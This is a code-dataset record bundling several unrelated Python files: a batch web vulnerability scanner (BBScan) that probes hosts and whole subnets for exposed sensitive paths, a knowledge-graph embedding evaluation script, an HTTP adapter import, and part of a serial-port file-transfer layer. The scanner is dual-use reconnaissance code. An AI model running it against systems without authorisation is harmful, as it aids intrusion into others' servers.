af11352491d4f165cfc04ec91fb9fb9edf7fef9b
|
[
"Apache-2.0"
] |
permissive
|
webvul/SubDomainsResultDeal
|
eeafb2a133e04471155c171290161ab283ca94a1
|
0303d95bd96b8f1e696c6534f686f30809763970
|
refs/heads/master
| 2020-04-07T08:13:42.885352
| 2017-09-07T14:21:03
| 2017-09-07T14:21:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,267
|
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# A tiny Batch weB vulnerability Scanner
# my[at]lijiejie.com http://www.lijiejie.com
import urlparse
import requests
import logging
import re
import threading
import Queue
from bs4 import BeautifulSoup
import multiprocessing
import time
from string import Template
import glob
import ipaddress
import os
import webbrowser
import socket
import sys
import ssl
import codecs
import traceback
from dns.resolver import Resolver
from lib.common import get_time, parse_url, decode_response_text
from lib.cmdline import parse_args
from lib.report import template
# SSL error ignored
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
socket.setdefaulttimeout(None)
class InfoDisScanner(object):
def __init__(self, timeout=600, args=None):
self.START_TIME = time.time()
self.TIME_OUT = timeout
self.args = args
self.LINKS_LIMIT = 100 # max number of Folders to scan
self.full_scan = args.full_scan
self._init_rules()
self.url_queue = Queue.Queue() # all urls to scan
self.urls_processed = set() # processed urls
self.urls_enqueued = set() # entered queue urls
self.lock = threading.Lock()
# reset scanner
def init_reset(self):
self.START_TIME = time.time()
self.url_queue.queue.clear()
self.urls_processed = set()
self.urls_enqueued = set()
self.results = {}
self.log_file = None
self._404_status = -1
# scan from a given URL
def init_from_url(self, url):
self.init_reset()
if not url.find('://') > 0:
self.url = 'http://' + url
else:
self.url = url
self.schema, self.host, self.path = parse_url(url)
self.init_final()
def init_from_log_file(self, log_file):
self.init_reset()
self.log_file = log_file
self.schema, self.host, self.path = self._parse_url_from_file()
self.load_all_urls_from_file()
self.init_final()
#
def init_final(self):
if not self.is_port_open():
return
self.base_url = '%s://%s' % (self.schema, self.host)
self.max_depth = self._cal_depth(self.path)[1] + 5
self.session = requests.session()
if self.args.no_check404:
self._404_status = 404
self.has_404 = True
else:
self.check_404() # check existence of HTTP 404
if not self.has_404:
print '[%s] [Warning] %s has no HTTP 404.' % (get_time(), self.host)
_path, _depth = self._cal_depth(self.path)
self._enqueue('/')
self._enqueue(_path)
if not self.args.no_crawl and not self.log_file:
self.crawl_index(_path)
def is_port_open(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4.0)
default_port = 443 if self.schema.lower() == 'https' else 80
host, port = self.host.split(':') if self.host.find(':') > 0 else (self.host, default_port)
if s.connect_ex((host, int(port))) == 0:
print '[%s] Scan %s' % (get_time(), self.host)
return True
else:
print '[%s] Fail to connect to %s' % (get_time(), self.host)
return False
s.close()
except Exception, e:
return False
finally:
s.close()
#
def _parse_url_from_file(self):
url = ''
with open(self.log_file) as infile:
for line in infile.xreadlines():
line = line.strip()
if line and len(line.split()) >= 2:
url = line.split()[1]
break
return parse_url(url)
# calculate depth of a given URL, return tuple (url, depth)
def _cal_depth(self, url):
if url.find('#') >= 0:
url = url[:url.find('#')] # cut off fragment
if url.find('?') >= 0:
url = url[:url.find('?')] # cut off query string
if url.startswith('//'):
return '', 10000 # //www.baidu.com/index.php
if not urlparse.urlparse(url, 'http').scheme.startswith('http'):
return '', 10000 # no HTTP protocol
if url.lower().startswith('http'):
_ = urlparse.urlparse(url, 'http')
if _.netloc == self.host: # same hostname
url = _.path
else:
return '', 10000 # not the same hostname
while url.find('//') >= 0:
url = url.replace('//', '/')
if not url:
return '/', 1 # http://www.example.com
if url[0] != '/':
url = '/' + url
url = url[: url.rfind('/')+1]
if url.split('/')[-2].find('.') > 0:
url = '/'.join(url.split('/')[:-2]) + '/'
depth = url.count('/')
return url, depth
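# e.g. _cal_depth('/admin/login.php') returns ('/admin/', 2); off-site or malformed
# links get depth 10000 so they are never crawled.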
#
# load urls from rules/*.txt
def _init_rules(self):
self.text_to_find = []
self.regex_to_find = []
self.text_to_exclude = []
self.regex_to_exclude = []
self.rules_set = set()
p_tag = re.compile('{tag="([^"]+)"}')
p_status = re.compile('{status=(\d{3})}')
p_content_type = re.compile('{type="([^"]+)"}')
p_content_type_no = re.compile('{type_no="([^"]+)"}')
for rule_file in glob.glob('rules/*.txt'):
with open(rule_file, 'r') as infile:
for url in infile.xreadlines():
url = url.strip()
if url.startswith('/'):
_ = p_tag.search(url)
tag = _.group(1).replace("{quote}", '"') if _ else ''
_ = p_status.search(url)
status = int(_.group(1)) if _ else 0
_ = p_content_type.search(url)
content_type = _.group(1) if _ else ''
_ = p_content_type_no.search(url)
content_type_no = _.group(1) if _ else ''
rule = (url.split()[0], tag, status, content_type, content_type_no)
if rule not in self.rules_set:
self.rules_set.add(rule)
re_text = re.compile('{text="(.*)"}')
re_regex_text = re.compile('{regex_text="(.*)"}')
_file_path = 'rules/white.list'
if not os.path.exists(_file_path):
return
for line in open(_file_path):
line = line.strip()
if not line or line.startswith('#'):
continue
_m = re_text.search(line)
if _m:
self.text_to_find.append(
_m.group(1).decode('utf-8', 'ignore')
)
else:
_m = re_regex_text.search(line)
if _m:
self.regex_to_find.append(
re.compile(_m.group(1).decode('utf-8', 'ignore'))
)
_file_path = 'rules/black.list'
if not os.path.exists(_file_path):
return
for line in open(_file_path):
line = line.strip()
if not line or line.startswith('#'):
continue
_m = re_text.search(line)
if _m:
self.text_to_exclude.append(
_m.group(1).decode('utf-8', 'ignore')
)
else:
_m = re_regex_text.search(line)
if _m:
self.regex_to_exclude.append(
re.compile(_m.group(1).decode('utf-8', 'ignore'))
)
#
def _http_request(self, url, timeout=20):
try:
if not url:
url = '/'
url = self.base_url + url
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36 BBScan/1.2',
'Range': 'bytes=0-10240',
'Connection': 'keep-alive'
}
resp = self.session.get(url, headers=headers, timeout=(3.0, timeout))
resp_headers = resp.headers
status = resp.status_code
if resp_headers.get('content-type', '').find('text') >= 0 \
or resp_headers.get('content-type', '').find('html') >= 0 \
or int(resp_headers.get('content-length', '0')) <= 10240:
html_doc = decode_response_text(resp.content)
else:
html_doc = ''
return status, resp_headers, html_doc
except:
return -1, {}, ''
#
def check_404(self):
try:
try:
self._404_status, headers, html_doc = self._http_request('/BBScan-404-existence-check')
except:
self._404_status, headers, html_doc = -1, {}, ''
self.has_404 = (self._404_status == 404)
if not self.has_404:
self.len_404_doc = len(html_doc)
return self.has_404
except Exception, e:
logging.error('[Check_404] Exception %s' % str(e))
#
def _enqueue(self, url):
url = str(url)
url_pattern = re.sub('\d+', '{num}', url)
if url_pattern in self.urls_processed or len(self.urls_processed) >= self.LINKS_LIMIT:
return False
else:
self.urls_processed.add(url_pattern)
# print url
for _ in self.rules_set:
try:
full_url = url.rstrip('/') + _[0]
except:
continue
if full_url in self.urls_enqueued:
continue
url_description = {'prefix': url.rstrip('/'), 'full_url': full_url}
item = (url_description, _[1], _[2], _[3], _[4])
self.url_queue.put(item)
self.urls_enqueued.add(full_url)
if self.full_scan and url.count('/') >= 3:
self._enqueue('/'.join(url.split('/')[:-2]) + '/') # sub folder enqueue
return True
#
def crawl_index(self, path):
try:
status, headers, html_doc = self._http_request(path)
if status != 200:
try:
html_doc = self.session.get(self.url, headers={'Connection': 'close'}).text
except Exception, e:
pass
soup = BeautifulSoup(html_doc, "html.parser")
for link in soup.find_all('a'):
url = link.get('href', '').strip()
url, depth = self._cal_depth(url)
if depth <= self.max_depth:
self._enqueue(url)
if self.find_text(html_doc):
self.results['/'] = []
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
_ = {'status': status, 'url': '%s%s' % (self.base_url, path), 'title': title}
if _ not in self.results['/']:
self.results['/'].append(_)
except Exception, e:
logging.error('[crawl_index Exception] %s' % str(e))
traceback.print_exc()
#
def load_all_urls_from_file(self):
try:
with open(self.log_file) as inFile:
for line in inFile.xreadlines():
_ = line.strip().split()
if len(_) == 3 and (_[2].find('^^^200') > 0 or _[2].find('^^^403') > 0 or _[2].find('^^^302') > 0):
url, depth = self._cal_depth(_[1])
self._enqueue(url)
except Exception, e:
logging.error('[load_all_urls_from_file Exception] %s' % str(e))
traceback.print_exc()
#
def find_text(self, html_doc):
for _text in self.text_to_find:
if html_doc.find(_text) > 0:
return True
for _regex in self.regex_to_find:
if _regex.search(html_doc):
return True
return False
#
def exclude_text(self, html_doc):
for _text in self.text_to_exclude:
if html_doc.find(_text) > 0:
return False
for _regex in self.regex_to_exclude:
if _regex.search(html_doc):
return False
return True
#
def _scan_worker(self):
while self.url_queue.qsize() > 0:
if time.time() - self.START_TIME > self.TIME_OUT:
self.url_queue.queue.clear()
print '[%s] [ERROR] Timed out task: %s' % (get_time(), self.host)
return
try:
item = self.url_queue.get(timeout=0.1)
except:
return
try:
url_description, tag, code, content_type, content_type_no = item
prefix = url_description['prefix']
url = url_description['full_url']
url = url.replace('{sub}', self.host.split('.')[0])
if url.find('{hostname_or_folder}') >= 0:
_url = url[: url.find('{hostname_or_folder}')]
folders = _url.split('/')
for _folder in reversed(folders):
if _folder not in ['', '.', '..']:
url = url.replace('{hostname_or_folder}', _folder)
break
url = url.replace('{hostname_or_folder}', self.host.split(':')[0])
url = url.replace('{hostname}', self.host.split(':')[0])
if url.find('{parent}') > 0:
if url.count('/') < 2:
continue
ret = url.split('/')
ret[-2] = ret[-1].replace('{parent}', ret[-2])
url = '/' + '/'.join(ret[:-1])
except Exception, e:
logging.error('[_scan_worker Exception] [1] %s' % str(e))
continue
if not item or not url:
break
# print '[%s]' % url.strip()
try:
status, headers, html_doc = self._http_request(url)
cur_content_type = headers.get('content-type', '')
if cur_content_type.find('image/') >= 0: # exclude image type
continue
if len(html_doc) < 10: # data too short
continue
if not self.exclude_text(html_doc): # exclude text found
continue
valid_item = False
if self.find_text(html_doc):
valid_item = True
else:
if status != code and status in [301, 302, 400, 404, 500, 501, 502, 503, 505]:
continue
if cur_content_type.find('application/json') >= 0 and \
not url.endswith('.json'): # no json
continue
if tag:
if html_doc.find(tag) >= 0:
valid_item = True
else:
continue # tag mismatch
if content_type and cur_content_type.find(content_type) < 0 \
or content_type_no and cur_content_type.find(content_type_no) >= 0:
continue # type mismatch
if self.has_404 or status != self._404_status:
if code and status != code and status != 206: # code mismatch
continue
elif code != 403 and status == 403:
continue
else:
valid_item = True
if not self.has_404 and status in (200, 206) and url != '/' and not tag:
_len = len(html_doc)
_min = min(_len, self.len_404_doc)
if _min == 0:
_min = 10.0
if float(_len - self.len_404_doc) / _min > 0.3:
valid_item = True
if status == 206:
if cur_content_type.find('text') < 0 and cur_content_type.find('html') < 0:
valid_item = True
if valid_item:
self.lock.acquire()
# print '[+] [Prefix:%s] [%s] %s' % (prefix, status, 'http://' + self.host + url)
if prefix not in self.results:
self.results[prefix] = []
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
_ = {'status': status, 'url': '%s%s' % (self.base_url, url), 'title': title}
if _ not in self.results[prefix]:
self.results[prefix].append(_)
self.lock.release()
if len(self.results) >= 10:
print '[ERROR] Over 10 vulnerabilities found [%s], seems to be false positives.' % prefix
self.url_queue.queue.clear()
except Exception, e:
logging.error('[_scan_worker.Exception][2][%s] %s' % (url, str(e)))
traceback.print_exc()
#
def scan(self, threads=6):
try:
threads_list = []
for i in range(threads):
t = threading.Thread(target=self._scan_worker)
threads_list.append(t)
t.start()
for t in threads_list:
t.join()
for key in self.results.keys():
if len(self.results[key]) > 10: # Over 10 URLs found under this folder: false positives
del self.results[key]
return self.host, self.results
except Exception, e:
print '[scan exception] %s' % str(e)
finally:
self.session.close()
def batch_scan(q_targets, q_results, lock, args):
s = InfoDisScanner(args.timeout*60, args=args)
while True:
try:
target = q_targets.get(timeout=1.0)
except:
break
_url = target['url']
_file = target['file']
if _url:
s.init_from_url(_url)
else:
if os.path.getsize(_file) == 0:
continue
s.init_from_log_file(_file)
if s.host == '':
continue
host, results = s.scan(threads=args.t)
if results:
q_results.put((host, results))
lock.acquire()
for key in results.keys():
for url in results[key]:
print '[+] [%s] %s' % (url['status'], url['url'])
lock.release()
def save_report_thread(q_results, file):
start_time = time.time()
if args.md:
a_template = template['markdown']
else:
a_template = template['html']
t_general = Template(a_template['general'])
t_host = Template(a_template['host'])
t_list_item = Template(a_template['list_item'])
output_file_suffix = a_template['suffix']
all_results = []
report_name = os.path.basename(file).lower().replace('.txt', '') \
+ '_' + time.strftime('%Y%m%d_%H%M%S', time.localtime()) + output_file_suffix
global STOP_ME
try:
while not STOP_ME:
if q_results.qsize() == 0:
time.sleep(0.1)
continue
html_doc = ""
while q_results.qsize() > 0:
all_results.append(q_results.get())
for item in all_results:
host, results = item
_str = ""
for key in results.keys():
for _ in results[key]:
_str += t_list_item.substitute(
{'status': _['status'], 'url': _['url'], 'title': _['title']}
)
_str = t_host.substitute({'host': host, 'list': _str})
html_doc += _str
cost_time = time.time() - start_time
cost_min = int(cost_time / 60)
cost_seconds = '%.2f' % (cost_time % 60)
html_doc = t_general.substitute(
{'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': html_doc}
)
with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
outFile.write(html_doc)
if all_results:
print '[%s] Scan report saved to report/%s' % (get_time(), report_name)
if args.browser:
webbrowser.open_new_tab(os.path.abspath('report/%s' % report_name))
else:
lock.acquire()
print '[%s] No vulnerabilities found on sites in %s.' % (get_time(), file)
lock.release()
except Exception, e:
print '[save_report_thread Exception] %s %s' % (type(e), str(e))
sys.exit(-1)
def domain_lookup():
r = Resolver()
r.timeout = r.lifetime = 8.0
while True:
try:
host = q_hosts.get(timeout=0.1)
print "[%s] host=> %s" % ("domain_lookup", host)
except:
break
_schema, _host, _path = parse_url(host)
try:
m = re.search('\d+\.\d+\.\d+\.\d+', _host.split(':')[0])
if m:
q_targets.put({'file': '', 'url': host})
ips_to_scan.append(m.group(0))
else:
answers = r.query(_host.split(':')[0])
if answers:
q_targets.put({'file': '', 'url': host})
for _ in answers:
ips_to_scan.append(_.address)
except Exception, e:
lock.acquire()
print '[%s] [Warning] Invalid domain: %s' % (get_time(), host)
lock.release()
if __name__ == '__main__':
args = parse_args()
if args.f:
input_files = [args.f]
elif args.d:
input_files = glob.glob(args.d + '/*.txt')
elif args.crawler:
input_files = ['crawler']
elif args.host:
input_files = ['hosts'] # several hosts on command line
ips_to_scan = [] # all IPs to be scanned during current scan
for file in input_files:
if args.host:
lines = [' '.join(args.host)]
elif args.f or args.d:
with open(file) as inFile:
lines = inFile.readlines()
try:
print '[%s] Batch web scan start.' % get_time()
q_results = multiprocessing.Manager().Queue()
q_targets = multiprocessing.Manager().Queue()
lock = multiprocessing.Manager().Lock()
STOP_ME = False
threading.Thread(target=save_report_thread, args=(q_results, file)).start()
print '[%s] Report thread created, prepare target Queue...' % get_time()
if args.crawler:
_input_files = glob.glob(args.crawler + '/*.log')
for _file in _input_files:
q_targets.put({'file': _file, 'url': ''})
if args.host or args.f or args.d:
q_hosts = Queue.Queue()
for line in lines:
if line.strip():
# Works with https://github.com/lijiejie/subDomainsBrute
# delimiter "," is acceptable
hosts = line.replace(',', ' ').strip().split()
for host in hosts:
q_hosts.put(host)
all_threads = []
for _ in range(20):
t = threading.Thread(target=domain_lookup)
all_threads.append(t)
t.start()
for t in all_threads:
t.join()
if args.network != 32:
for ip in ips_to_scan:
if ip.find('/') > 0:
continue
_network = u'%s/%s' % ('.'.join(ip.split('.')[:3]), args.network)
if _network in ips_to_scan:
continue
ips_to_scan.append(_network)
_ips = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()
for _ip in _ips:
_ip = str(_ip)
if _ip not in ips_to_scan:
ips_to_scan.append(_ip)
q_targets.put({'file': '', 'url': _ip})
print '[%s] %s targets entered Queue.' % (get_time(), q_targets.qsize())
print '[%s] Create %s sub Processes...' % (get_time(), args.p)
scan_process = []
for _ in range(args.p):
p = multiprocessing.Process(target=batch_scan, args=(q_targets, q_results, lock, args))
p.daemon = True
p.start()
scan_process.append(p)
print '[%s] %s sub process successfully created.' % (get_time(), args.p)
for p in scan_process:
p.join()
except KeyboardInterrupt, e:
print '[+] [%s] User aborted, running tasks crashed.' % get_time()
try:
while True:
q_targets.get_nowait()
except:
pass
except Exception, e:
print '[__main__.exception] %s %s' % (type(e), str(e))
traceback.print_exc()
STOP_ME = True
|
[
"xiaoyan_jia1@163.com"
] |
xiaoyan_jia1@163.com
|
f86bc180d693ab21bdd9ff67555b9281d39ac601
|
73f2b42955f151718a47a6d93a4f7175830edbac
|
/AWML_TransE/evaluation_tc.py
|
49455a94df40d53653698640cdbaf31a571dfa37
|
[] |
no_license
|
orangegcc/AWML
|
d1e6b501cbdb1297fc56de9736a75e3f89b59593
|
f9943eaa61b22618c759d51d7976b0878045cf24
|
refs/heads/master
| 2020-03-30T15:12:32.055863
| 2018-10-10T13:37:52
| 2018-10-10T13:37:52
| 151,352,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,304
|
py
|
#! /usr/bin/python
import sys
import cPickle
from modelC import *
def load_file(path):
return scipy.sparse.csr_matrix(cPickle.load(open(path)),
dtype=theano.config.floatX)
def convert2idx(spmat):
rows, cols = spmat.nonzero()
return rows[np.argsort(cols)]
def RankingEval(datapath='../data_WN18/', dataset='WN-test',
loadmodel='best_valid_model.pkl', neval='all', Nsyn=40943, n=1,
idx2synsetfile='WN_idx2synset.pkl'):
# Load model
f = open(loadmodel)
embeddings = cPickle.load(f)
f.close()
leftop = LayerTrans()
rightop = Unstructured()
simfn = eval('L1sim')
# Load data
testl = load_file(datapath + dataset + '-lhs.pkl')
testr = load_file(datapath + dataset + '-rhs.pkl')
testo = load_file(datapath + dataset + '-rel.pkl')
if type(embeddings) is list:
testo = testo[-18:, :]
# Convert sparse matrix to indexes
if neval == 'all':
idxtl = convert2idx(testl)
idxtr = convert2idx(testr)
idxto = convert2idx(testo)
else:
idxtl = convert2idx(testl)[:neval]
idxtr = convert2idx(testr)[:neval]
idxto = convert2idx(testo)[:neval]
# Positives
trainl = load_file(datapath + 'WN-train-lhs.pkl')
trainr = load_file(datapath + 'WN-train-rhs.pkl')
traino = load_file(datapath + 'WN-train-rel.pkl')
traino = traino[-18:, :]
# Valid set
validl = load_file(datapath + 'WN-valid-lhs.pkl')
validr = load_file(datapath + 'WN-valid-rhs.pkl')
valido = load_file(datapath + 'WN-valid-rel.pkl')
valido = valido[-18:, :]
idxl = convert2idx(trainl)
idxr = convert2idx(trainr)
idxo = convert2idx(traino)
idxvl = convert2idx(validl)
idxvr = convert2idx(validr)
idxvo = convert2idx(valido)
true_triples = np.concatenate([idxtl,idxvl,idxl,idxto,idxvo,idxo,idxtr,idxvr,idxr]).reshape(3,idxtl.shape[0]+idxvl.shape[0]+idxl.shape[0]).T
rankofunc = RankRelFnIdx(simfn, embeddings, leftop, rightop,
subtensorspec=Nsyn)
'''with open('rel2subrel_apC.pkl','rb') as f:
rel2subrel = cPickle.load(f)'''
res = FilteredRankingScoreRelIdx(rankofunc, idxtl, idxtr, idxto, true_triples)
dres = {}
dres.update({'micromean': np.mean(res)})
dres.update({'micromedian': np.median(res)})
dres.update({'microhits@n': np.mean(np.asarray(res) <= n) * 100})
print "### MICRO:"
print "\t-- global >> mean: %s, median: %s, hits@%s: %s%%" % (
round(dres['micromean'], 5), round(dres['micromedian'], 5),
n, round(dres['microhits@n'], 3))
''' listrel = set(idxo)
dictrelres = {}
dictrellmean = {}
dictrelrmean = {}
dictrelgmean = {}
dictrellmedian = {}
dictrelrmedian = {}
dictrelgmedian = {}
dictrellrn = {}
dictrelrrn = {}
dictrelgrn = {}
for i in listrel:
dictrelres.update({i: [[], []]})
for i, j in enumerate(res[0]):
dictrelres[idxto[i]][0] += [j]
for i, j in enumerate(res[1]):
dictrelres[idxto[i]][1] += [j]
for i in listrel:
dictrellmean[i] = np.mean(dictrelres[i][0])
dictrelrmean[i] = np.mean(dictrelres[i][1])
dictrelgmean[i] = np.mean(dictrelres[i][0] + dictrelres[i][1])
dictrellmedian[i] = np.median(dictrelres[i][0])
dictrelrmedian[i] = np.median(dictrelres[i][1])
dictrelgmedian[i] = np.median(dictrelres[i][0] + dictrelres[i][1])
dictrellrn[i] = np.mean(np.asarray(dictrelres[i][0]) <= n) * 100
dictrelrrn[i] = np.mean(np.asarray(dictrelres[i][1]) <= n) * 100
dictrelgrn[i] = np.mean(np.asarray(dictrelres[i][0] +
dictrelres[i][1]) <= n) * 100
dres.update({'dictrelres': dictrelres})
dres.update({'dictrellmean': dictrellmean})
dres.update({'dictrelrmean': dictrelrmean})
dres.update({'dictrelgmean': dictrelgmean})
dres.update({'dictrellmedian': dictrellmedian})
dres.update({'dictrelrmedian': dictrelrmedian})
dres.update({'dictrelgmedian': dictrelgmedian})
dres.update({'dictrellrn': dictrellrn})
dres.update({'dictrelrrn': dictrelrrn})
dres.update({'dictrelgrn': dictrelgrn})
dres.update({'macrolmean': np.mean(dictrellmean.values())})
dres.update({'macrolmedian': np.mean(dictrellmedian.values())})
dres.update({'macrolhits@n': np.mean(dictrellrn.values())})
dres.update({'macrormean': np.mean(dictrelrmean.values())})
dres.update({'macrormedian': np.mean(dictrelrmedian.values())})
dres.update({'macrorhits@n': np.mean(dictrelrrn.values())})
dres.update({'macrogmean': np.mean(dictrelgmean.values())})
dres.update({'macrogmedian': np.mean(dictrelgmedian.values())})
dres.update({'macroghits@n': np.mean(dictrelgrn.values())})
print "### MACRO:"
print "\t-- left >> mean: %s, median: %s, hits@%s: %s%%" % (
round(dres['macrolmean'], 5), round(dres['macrolmedian'], 5),
n, round(dres['macrolhits@n'], 3))
print "\t-- right >> mean: %s, median: %s, hits@%s: %s%%" % (
round(dres['macrormean'], 5), round(dres['macrormedian'], 5),
n, round(dres['macrorhits@n'], 3))
print "\t-- global >> mean: %s, median: %s, hits@%s: %s%%" % (
round(dres['macrogmean'], 5), round(dres['macrogmedian'], 5),
n, round(dres['macroghits@n'], 3))
idx2synset = cPickle.load(open(datapath + idx2synsetfile))
offset = 0
if type(embeddings) is list:
idxto = idxto[-embeddings[1].N:, :]
offset = l.shape[0] - embeddings[1].N
for i in np.sort(list(listrel)):
print "### RELATION %s:" % idx2synset[offset + i]
print "\t-- left >> mean: %s, median: %s, hits@%s: %s%%, N: %s" % (
round(dictrellmean[i], 5), round(dictrellmedian[i], 5),
n, round(dictrellrn[i], 3), len(dictrelres[i][0]))
print "\t-- right >> mean: %s, median: %s, hits@%s: %s%%, N: %s" % (
round(dictrelrmean[i], 5), round(dictrelrmedian[i], 5),
n, round(dictrelrrn[i], 3), len(dictrelres[i][1]))
print "\t-- global >> mean: %s, median: %s, hits@%s: %s%%, N: %s" % (
round(dictrelgmean[i], 5), round(dictrelgmedian[i], 5),
n, round(dictrelgrn[i], 3),
len(dictrelres[i][0] + dictrelres[i][1]))
'''
return dres
def ClassifEval(datapath='../data_WN18/', validset='WN-valid', testset='WN-test',
loadmodel='best_valid_model.pkl', seed=647):
# Load model
f = open(loadmodel)
embeddings = cPickle.load(f)
leftop = cPickle.load(f)
rightop = cPickle.load(f)
simfn = cPickle.load(f)
f.close()
np.random.seed(seed)
# Load data
lv = load_file(datapath + validset + '-lhs.pkl')
lvn = lv[:, np.random.permutation(lv.shape[1])]
rv = load_file(datapath + validset + '-rhs.pkl')
rvn = rv[:, np.random.permutation(lv.shape[1])]
ov = load_file(datapath + validset + '-rel.pkl')
ovn = ov[:, np.random.permutation(lv.shape[1])]
if type(embeddings) is list:
ov = ov[-embeddings[1].N:, :]
ovn = ovn[-embeddings[1].N:, :]
# Load data
lt = load_file(datapath + testset + '-lhs.pkl')
ltn = lt[:, np.random.permutation(lv.shape[1])]
rt = load_file(datapath + testset + '-rhs.pkl')
rtn = rt[:, np.random.permutation(lv.shape[1])]
ot = load_file(datapath + testset + '-rel.pkl')
otn = ot[:, np.random.permutation(lv.shape[1])]
if type(embeddings) is list:
ot = ot[-embeddings[1].N:, :]
otn = otn[-embeddings[1].N:, :]
simfunc = SimFn(simfn, embeddings, leftop, rightop)
resv = simfunc(lv, rv, ov)[0]
resvn = simfunc(lvn, rvn, ovn)[0]
rest = simfunc(lt, rt, ot)[0]
restn = simfunc(ltn, rtn, otn)[0]
# Threshold
perf = 0
T = 0
for val in list(np.concatenate([resv, resvn])):
tmpperf = (resv > val).sum() + (resvn <= val).sum()
if tmpperf > perf:
perf = tmpperf
T = val
testperf = ((rest > T).sum() + (restn <= T).sum()) / float(2 * len(rest))
print "### Classification performance : %s%%" % round(testperf * 100, 3)
return testperf
if __name__ == '__main__':
#ClassifEval()
RankingEval(loadmodel=sys.argv[1])
|
[
"orangegcc@bupt.edu.cn"
] |
orangegcc@bupt.edu.cn
|
b289fce0628cac0aed162d7e3cd44991042fac2a
|
eedc92c3c382107de89c71ee3fce50ed1b76bc77
|
/src/internals/adapters/http/__init__.py
|
5a35e220e6920ed1607bf25fd7db8e413693ce54
|
[
"MIT"
] |
permissive
|
mabel-dev/rosey
|
01f60570f3513df7ff6e666a63de1208fa9fb609
|
b48b9920b1eec972a185be75741ede53b8f3de34
|
refs/heads/main
| 2023-05-29T00:00:10.630357
| 2021-06-13T19:33:27
| 2021-06-13T19:33:27
| 362,224,667
| 0
| 0
|
MIT
| 2021-06-14T03:00:21
| 2021-04-27T19:14:49
|
Python
|
UTF-8
|
Python
| false
| false
| 73
|
py
|
from .http_adapter import HttpAdapter, GetRequestModel, PostRequestModel
|
[
"justin.joyce+rosey@joocer.com"
] |
justin.joyce+rosey@joocer.com
|
74f45ffa09fc6e70f46d76001e3054e4fd5a37e1
|
837be787b2e2ca0c4fe40eea49dc59a4a7b07ada
|
/net_layers/app_layer.py
|
df82a228d8b789bf1b1fa701de042ef70a452709
|
[] |
no_license
|
SvetaZlobina/serial-port-driver
|
1a31d072f47899cec3397f8d0292721a83be830f
|
b0be42a26005a114023dd68fc3bc5132eb67dee2
|
refs/heads/master
| 2020-03-14T18:15:15.284250
| 2019-08-01T08:58:09
| 2019-08-01T08:58:09
| 131,737,755
| 0
| 1
| null | 2018-05-15T10:18:49
| 2018-05-01T16:45:40
|
Python
|
UTF-8
|
Python
| false
| false
| 14,416
|
py
|
import os
import time
class AppLayer:
msg_types = {'FILE': b'f',
'MSG': b'm',
'FILE_END': b'l',
'FILE_PROPOSE': b'p',
'FILE_ACK': b'a',
'FILE_NAK': b'n'}
MSG_TYPE_LEN = 1 # length of the message-type field, in bytes
MSG_SIZE_LEN = 1 # length of the message-size field, in bytes
FNAME_SIZE_LEN = 1 # length of the file-name-size field, in bytes
DATA_SIZE_LEN = 4 # length of the data-size field, in bytes
def __init__(self, datalink_layer):
self.dl_layer = datalink_layer
self.save_dir_name = '.'
self.text_buffer = b''
self.status = 'Free'
def check_received(self):
"""
Check whether any message has been received at the data-link layer.
:return: the received message itself, utf-8 encoded
"""
if self.status != 'Free':
return None
bytes_str = self.dl_layer.check_received()
if bytes_str is None:
return None
msg_type = self._deform_message(bytes_str)['msg_type']
if msg_type not in self.msg_types.values():
raise ValueError("Received unknown message type. It's {}".format(msg_type))
if msg_type == self.msg_types['MSG']:
return self.receive_msg(bytes_str)
elif msg_type == self.msg_types['FILE_PROPOSE']:
return self.receive_file_proposal(bytes_str)
elif msg_type == self.msg_types['FILE']:
return self.receive_file(bytes_str)
elif msg_type == self.msg_types['FILE_END']:
return self.receive_file_completely(bytes_str)
elif msg_type == self.msg_types['FILE_ACK'] or msg_type == self.msg_types['FILE_NAK']:
return self.send_file(bytes_str)
else:
raise ValueError("Don't know how to process {} at app_layer.check_received".format(msg_type))
def send_file_propose(self, fname):
"""
Send a message proposing to transfer a file.
:param fname: absolute file name
:return:
"""
self._send_message(self.msg_types['FILE_PROPOSE'], fname=fname)
def receive_file_proposal(self, bytes_str):
"""
Receive and handle a proposal to accept a file.
The FileProposal exception carries the "accept the file or decline" prompt up to the application interface
:param bytes_str: the string with the proposal
:return:
"""
fname = self._deform_message(bytes_str)['fname']
raise self.FileProposal(fname)
def send_file_ack(self, fname, save_dir_name):
"""
Send a message agreeing to accept the file.
:param fname: absolute file name
:param save_dir_name: name of the directory where the received file will be saved
:return:
"""
self.save_dir_name = save_dir_name
self._send_message(self.msg_types['FILE_ACK'], fname=fname)
def send_file_nak(self, fname):
"""
Send a message declining to accept the file
:param fname: absolute file name
:return:
"""
self._send_message(self.msg_types['FILE_NAK'], fname=fname)
def send_msg(self, msg):
"""
Передача "сообщения", в смысле сообщения в чате
:param msg: текст "сообщения"
:return:
"""
self._send_message(self.msg_types['MSG'], data=msg)
def receive_msg(self, bytes_str):
"""
Получение "сообщения", в смысле сообщения в чате
:param bytes_str: данные из канального уровня
:return: кортеж (отправитель, текст сообщения)
"""
self.status = 'Receiving message'
msg = self._deform_message(bytes_str)['msg']
self.status = 'Free'
return msg
def send_file(self, bytes_str):
"""
Отправка файла через сеть.
:param bytes_str: строка с согласием или отказом принять файл от другого пользователя
:return: сообщение об отправке файла
"""
msg_type, fname = [self._deform_message(bytes_str)[x] for x in ['msg_type', 'fname']]
if msg_type == self.msg_types['FILE_NAK']:
raise self.FileNotAcknowledged(fname)
try:
with open(fname, 'rb') as f:
for line in f:
if self.dl_layer.is_paused:
# curr_position = f.tell()
while self.dl_layer.is_paused:
print('sending is paused')
msg = self.dl_layer.check_received()
time.sleep(1)
print('line to send:', line.decode('utf-8'))
self._send_message(self.msg_types['FILE'], fname=self.short_fname(fname), data=line)
except Exception as e:
